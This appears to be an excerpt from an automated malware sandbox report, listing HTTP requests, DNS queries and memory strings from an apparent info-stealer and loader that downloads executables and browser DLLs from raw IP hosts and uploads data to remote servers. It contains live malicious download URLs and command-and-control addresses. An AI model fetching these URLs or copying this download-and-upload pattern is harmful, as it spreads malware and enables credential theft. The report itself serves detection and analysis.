                        Source: global trafficHTTP traffic detected: HEAD /yuop/66ee79315857f_setup33333.exe#lyla HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: 147.45.44.104Cache-Control: no-cache
                        Source: global trafficHTTP traffic detected: HEAD /lopsa/66ea645129e6a_jacobs.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: 147.45.44.104Cache-Control: no-cache
                        Source: global trafficHTTP traffic detected: HEAD /yuop/66ed9885d9aee_Day2.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: 147.45.44.104Cache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET /thebig/noode.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: 176.113.115.33Cache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET /kurwa HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: 176.111.174.109Cache-Control: no-cache
                        Source: global trafficHTTP traffic detected: HEAD /yuop/66eea6336b153_app16540406983468141987.exe#1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: 147.45.44.104Cache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET /prog/66e705d09b33c_jack.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: 147.45.44.104Cache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET /yuop/66edb89bc4073_crypted.exe#xin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: 147.45.44.104Cache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET /lopsa/66ebb3bf78bd6_Send.exe#111us300 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: 147.45.44.104Cache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET /yuop/66ee79315857f_setup33333.exe#lyla HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: 147.45.44.104Cache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET /lopsa/66ea645129e6a_jacobs.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: 147.45.44.104Cache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET /yuop/66ed9885d9aee_Day2.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: 147.45.44.104Cache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET /yuop/66eea6336b153_app16540406983468141987.exe#1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: 147.45.44.104Cache-Control: no-cache
                        Source: global trafficHTTP traffic detected: POST /api/wp-admin.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Content-Length: 561Host: 41.216.188.190
                        Source: global trafficHTTP traffic detected: POST /v1/upload.php HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: multipart/form-data; boundary=----Boundary82269225User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Content-Length: 412Host: tventyvf20pt.top
                        Source: global trafficHTTP traffic detected: POST /v1/upload.php HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: multipart/form-data; boundary=----Boundary38423990User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Content-Length: 67973Host: tventyvf20pt.top
                        Source: global trafficHTTP traffic detected: POST /v1/upload.php HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: multipart/form-data; boundary=----Boundary32946194User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Content-Length: 30036Host: tventyvf20pt.top
                        Source: global trafficHTTP traffic detected: GET /prog/66ecb454d2b4a_lgfdsjgds.exe HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 147.45.44.104Cache-Control: no-cache
                        Source: unknownTCP traffic detected without corresponding DNS query: 41.216.188.190
                        Source: unknownTCP traffic detected without corresponding DNS query: 41.216.188.190
                        Source: unknownTCP traffic detected without corresponding DNS query: 41.216.188.190
                        Source: unknownTCP traffic detected without corresponding DNS query: 41.216.188.190
                        Source: unknownTCP traffic detected without corresponding DNS query: 41.216.188.190
                        Source: unknownTCP traffic detected without corresponding DNS query: 41.216.188.190
                        Source: unknownTCP traffic detected without corresponding DNS query: 41.216.188.190
                        Source: unknownTCP traffic detected without corresponding DNS query: 41.216.188.190
                        Source: unknownTCP traffic detected without corresponding DNS query: 41.216.188.190
                        Source: unknownTCP traffic detected without corresponding DNS query: 41.216.188.190
                        Source: unknownTCP traffic detected without corresponding DNS query: 41.216.188.190
                        Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                        Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                        Source: unknownTCP traffic detected without corresponding DNS query: 103.130.147.211
                        Source: unknownTCP traffic detected without corresponding DNS query: 176.111.174.109
                        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.33
                        Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                        Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                        Source: unknownTCP traffic detected without corresponding DNS query: 103.130.147.211
                        Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                        Source: unknownTCP traffic detected without corresponding DNS query: 103.130.147.211
                        Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                        Source: unknownTCP traffic detected without corresponding DNS query: 176.111.174.109
                        Source: unknownTCP traffic detected without corresponding DNS query: 176.111.174.109
                        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.33
                        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.33
                        Source: unknownTCP traffic detected without corresponding DNS query: 103.130.147.211
                        Source: unknownTCP traffic detected without corresponding DNS query: 103.130.147.211
                        Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                        Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                        Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                        Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                        Source: unknownTCP traffic detected without corresponding DNS query: 176.111.174.109
                        Source: unknownTCP traffic detected without corresponding DNS query: 176.111.174.109
                        Source: unknownTCP traffic detected without corresponding DNS query: 103.130.147.211
                        Source: unknownTCP traffic detected without corresponding DNS query: 103.130.147.211
                        Source: unknownTCP traffic detected without corresponding DNS query: 103.130.147.211
                        Source: unknownTCP traffic detected without corresponding DNS query: 103.130.147.211
                        Source: unknownTCP traffic detected without corresponding DNS query: 103.130.147.211
                        Source: unknownTCP traffic detected without corresponding DNS query: 103.130.147.211
                        Source: unknownTCP traffic detected without corresponding DNS query: 103.130.147.211
                        Source: unknownTCP traffic detected without corresponding DNS query: 103.130.147.211
                        Source: unknownTCP traffic detected without corresponding DNS query: 103.130.147.211
                        Source: unknownTCP traffic detected without corresponding DNS query: 103.130.147.211
                        Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.33
                        Source: unknownTCP traffic detected without corresponding DNS query: 176.111.174.109
                        Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                        Source: unknownTCP traffic detected without corresponding DNS query: 176.111.174.109
                        Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0050CA00 InternetOpenA,InternetOpenUrlA,InternetOpenUrlA,InternetReadFile,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,3_2_0050CA00
                        Source: global trafficHTTP traffic detected: GET /?format=json HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: api64.ipify.org
                        Source: global trafficHTTP traffic detected: GET /widget/demo/8.46.123.33 HTTP/1.1Connection: Keep-AliveReferer: https://ipinfo.io/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: ipinfo.io
                        Source: global trafficHTTP traffic detected: GET /kcatelin/jameson/downloads/easyfirewall.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: bitbucket.orgCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET /vsfdhgg15.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: nerv.com.peCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET /sdhsfd.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: nerv.com.peCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET /bbfbfb0f-4597-4ff3-b025-124f61baf271/downloads/7f30c6a5-e68f-46b2-82dc-be29f7fa498f/easyfirewall.exe?response-content-disposition=attachment%3B%20filename%3D%22easyfirewall.exe%22&AWSAccessKeyId=ASIA6KOSE3BNGNWBPVIG&Signature=RG7gLpLQM9DgrtzKECr%2F5hgaEBw%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEFQaCXVzLWVhc3QtMSJHMEUCIQDFdamkZ04A05ya5JjE%2BO96KfXxuSlOnxf1KU2WbhcgUAIgZVAiwI6sPTiv1NV5OPTMgcBSTcThYLQvzmHVuZLepfEqsAIIjf%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FARAAGgw5ODQ1MjUxMDExNDYiDEWlad7oE1ErA4%2BxniqEAkPBXDxCFRBvIDaMXH7btuCQePvBHv56Z32PJd%2BrgVAazFvcT%2BdKnWonvbgD%2Bl83gjxQvJNinimAUee0zl9An1zjHrdCynGOjIYCd10WgZZ37gvIdBvOekdVSJQN4VvROptCwbViUPgEar%2FvniBV%2B9dqfZdJIelwOng6Fln8TYeg%2Fl7wUG0nZY4e%2FMaCUav1Yku%2FrJGpCSh4n1nCWTKS7G8gb01L5gOI8TnzTwcjXoM61eavAdUsF%2FtJR2uJ0%2BlBHAgp11FQKPWY6BApQnVnlTsKXD%2Fzo4xyODNargGwFCcO8KVN97GtOSH0yfnXUN2LEsVwXZ144uxzDcaZqLaCMuxhFmrDMODaurcGOp0BK2eIjmGLV4b2uwA8kI4vRD9zrjU%2BmUC3l1cVxad27xvHP82pnJ2i1cZxwMDbzFINMt0y8GSW3msaumnuqBQuixm4zhYMg6rT6MFqZP28%2B%2FJuSlZgb%2BkDseti8cbPYao%2FN7WkgFVWx54F%2F7M1c4sTBsc%2F5%2BvRyyOUVbpkc1t71ns4lfqSh3BTkvYEoJGMd0wh2U5uz5SUmMFeE%2FwfYQ%3D%3D&Expires=1726919784 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Cache-Control: no-cacheHost: bbuseruploads.s3.amazonaws.comConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /vfsdgdf.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: nerv.com.peCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET /1nhuM4.js HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: iplogger.org
                        Source: global trafficHTTP traffic detected: GET /lgsfdam.exe HTTP/1.1Host: nerv.com.peCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET /profiles/76561199780418869 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 116.203.165.127Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET /sqlp.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 116.203.165.127Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET /freebl3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 116.203.165.127Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET /mozglue.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 116.203.165.127Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET /msvcp140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 116.203.165.127Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET /softokn3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 116.203.165.127Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET /vcruntime140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 116.203.165.127Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET /nss3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 116.203.165.127Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 116.203.165.127Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET /sqlp.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 116.203.165.127Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET /api/wp-ping.php HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 41.216.188.190
                        Source: global trafficHTTP traffic detected: GET /Files/1.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: 103.130.147.211Cache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET /thebig/noode.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: 176.113.115.33Cache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET /kurwa HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: 176.111.174.109Cache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET /prog/66e705d09b33c_jack.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: 147.45.44.104Cache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET /yuop/66edb89bc4073_crypted.exe#xin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: 147.45.44.104Cache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET /lopsa/66ebb3bf78bd6_Send.exe#111us300 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: 147.45.44.104Cache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET /yuop/66ee79315857f_setup33333.exe#lyla HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: 147.45.44.104Cache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET /lopsa/66ea645129e6a_jacobs.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: 147.45.44.104Cache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET /yuop/66ed9885d9aee_Day2.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: 147.45.44.104Cache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET /yuop/66eea6336b153_app16540406983468141987.exe#1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: 147.45.44.104Cache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 46.8.231.109Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET /1309cdeb8f4c8736/sqlite3.dll HTTP/1.1Host: 46.8.231.109Cache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET /1309cdeb8f4c8736/freebl3.dll HTTP/1.1Host: 46.8.231.109Cache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET /1309cdeb8f4c8736/mozglue.dll HTTP/1.1Host: 46.8.231.109Cache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET /1309cdeb8f4c8736/msvcp140.dll HTTP/1.1Host: 46.8.231.109Cache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET /1309cdeb8f4c8736/nss3.dll HTTP/1.1Host: 46.8.231.109Cache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET /1309cdeb8f4c8736/softokn3.dll HTTP/1.1Host: 46.8.231.109Cache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET /1309cdeb8f4c8736/vcruntime140.dll HTTP/1.1Host: 46.8.231.109Cache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET /prog/66ecb454d2b4a_lgfdsjgds.exe HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 147.45.44.104Cache-Control: no-cache
                        Source: global trafficDNS traffic detected: DNS query: api64.ipify.org
                        Source: global trafficDNS traffic detected: DNS query: ipinfo.io
                        Source: global trafficDNS traffic detected: DNS query: nerv.com.pe
                        Source: global trafficDNS traffic detected: DNS query: bitbucket.org
                        Source: global trafficDNS traffic detected: DNS query: bbuseruploads.s3.amazonaws.com
                        Source: global trafficDNS traffic detected: DNS query: iplogger.org
                        Source: global trafficDNS traffic detected: DNS query: tventyvf20pt.top
                        Source: global trafficDNS traffic detected: DNS query: steamcommunity.com
                        Source: global trafficDNS traffic detected: DNS query: questionmwq.shop
                        Source: global trafficDNS traffic detected: DNS query: cowod.hopto.org
                        Source: unknownHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----FCGIJDBAFCBAAKECGDGCUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 116.203.165.127Content-Length: 256Connection: Keep-AliveCache-Control: no-cache
                        Source: RegAsm.exe, 00000003.00000002.1832712263.0000000003E60000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1830248913.00000000014E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://103.130.147.211/Files/1.exe
                        Source: RegAsm.exe, 00000003.00000002.1832712263.0000000003E60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://103.130.147.211/Files/1.exeC:
                        Source: RegAsm.exe, 00000003.00000002.1832712263.0000000003E60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://103.130.147.211/Files/1.exeO
                        Source: RegAsm.exe, 00000003.00000002.1830248913.00000000014E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://103.130.147.211/Files/1.exeexe9b3/8
                        Source: RegAsm.exe, 00000003.00000002.1830248913.00000000014E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://147.45.44.104/0
                        Source: RegAsm.exe, 00000003.00000002.1832712263.0000000003EC4000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1830248913.00000000014E1000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1830248913.000000000150F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://147.45.44.104/lopsa/66ea645129e6a_jacobs.exe
                        Source: RegAsm.exe, 00000003.00000002.1830248913.00000000014E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://147.45.44.104/lopsa/66ea645129e6a_jacobs.exe/
                        Source: RegAsm.exe, 00000003.00000002.1832712263.0000000003EC4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://147.45.44.104/lopsa/66ea645129e6a_jacobs.exeC
                        Source: RegAsm.exe, 00000003.00000002.1830248913.000000000150F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://147.45.44.104/lopsa/66ea645129e6a_jacobs.exeC:
                        Source: RegAsm.exe, 00000003.00000002.1830248913.00000000014E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://147.45.44.104/lopsa/66ea645129e6a_jacobs.exeS
                        Source: RegAsm.exe, 00000003.00000002.1832712263.0000000003EC4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://147.45.44.104/lopsa/66ea645129e6a_jacobs.exek
                        Source: RegAsm.exe, 00000003.00000002.1832712263.0000000003E60000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1830248913.00000000014E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://147.45.44.104/lopsa/66ebb3bf78bd6_Send.exe#111us300
                        Source: RegAsm.exe, 00000003.00000002.1830248913.00000000014E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://147.45.44.104/lopsa/66ebb3bf78bd6_Send.exe#111us300#
                        Source: RegAsm.exe, 00000003.00000002.1832712263.0000000003E60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://147.45.44.104/lopsa/66ebb3bf78bd6_Send.exe#111us300C:
                        Source: RegAsm.exe, 00000003.00000002.1832712263.0000000003E60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://147.45.44.104/lopsa/66ebb3bf78bd6_Send.exe#111us300R
                        Source: RegAsm.exe, 00000003.00000002.1830248913.00000000014E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://147.45.44.104/lopsa/66ebb3bf78bd6_Send.exe#111us300s
                        Source: RegAsm.exe, 00000003.00000002.1830248913.00000000014E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://147.45.44.104/lopsa/66ebb3bf78bd6_Send.exe#111us300~
                        Source: RegAsm.exe, 00000003.00000002.1832712263.0000000003EC4000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1830248913.00000000014E1000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1830248913.000000000150F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://147.45.44.104/prog/66e705d09b33c_jack.exe
                        Source: RegAsm.exe, 00000003.00000002.1830248913.00000000014E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://147.45.44.104/prog/66e705d09b33c_jack.exeA
                        Source: RegAsm.exe, 00000003.00000002.1830248913.000000000150F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://147.45.44.104/prog/66e705d09b33c_jack.exeC:
                        Source: RegAsm.exe, 00000003.00000002.1830248913.00000000014E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://147.45.44.104/prog/66e705d09b33c_jack.exeL
                        Source: RegAsm.exe, 00000003.00000002.1832712263.0000000003EC4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://147.45.44.104/prog/66e705d09b33c_jack.exek
                        Source: RegAsm.exe, 00000003.00000002.1832712263.0000000003EC4000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1830248913.00000000014E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://147.45.44.104/yuop/66ed9885d9aee_Day2.exe
                        Source: RegAsm.exe, 00000003.00000002.1832712263.0000000003EC4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://147.45.44.104/yuop/66ed9885d9aee_Day2.exe#
                        Source: RegAsm.exe, 00000003.00000002.1830248913.00000000014E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://147.45.44.104/yuop/66ed9885d9aee_Day2.exe3.exe#lyla
                        Source: RegAsm.exe, 00000003.00000002.1832712263.0000000003E60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://147.45.44.104/yuop/66ed9885d9aee_Day2.exeC:
                        Source: RegAsm.exe, 00000003.00000002.1830248913.00000000014E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://147.45.44.104/yuop/66ed9885d9aee_Day2.exe_
                        Source: RegAsm.exe, 00000003.00000002.1830248913.00000000014E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://147.45.44.104/yuop/66ed9885d9aee_Day2.exexe
                        Source: RegAsm.exe, 00000003.00000002.1832712263.0000000003EC4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://147.45.44.104/yuop/66ed9885d9aee_Day2.exexexins
                        Source: RegAsm.exe, 00000003.00000002.1830248913.000000000148D000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1832712263.0000000003E60000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1830248913.00000000014E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://147.45.44.104/yuop/66edb89bc4073_crypted.exe#xin
                        Source: RegAsm.exe, 00000003.00000002.1832712263.0000000003E60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://147.45.44.104/yuop/66edb89bc4073_crypted.exe#xinC:
                        Source: RegAsm.exe, 00000003.00000002.1830248913.000000000148D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://147.45.44.104/yuop/66edb89bc4073_crypted.exe#xiny
                        Source: RegAsm.exe, 00000003.00000002.1832712263.0000000003E60000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1830248913.00000000014E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://147.45.44.104/yuop/66ee79315857f_setup33333.exe#lyla
                        Source: RegAsm.exe, 00000003.00000002.1830248913.00000000014E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://147.45.44.104/yuop/66ee79315857f_setup33333.exe#lyla#
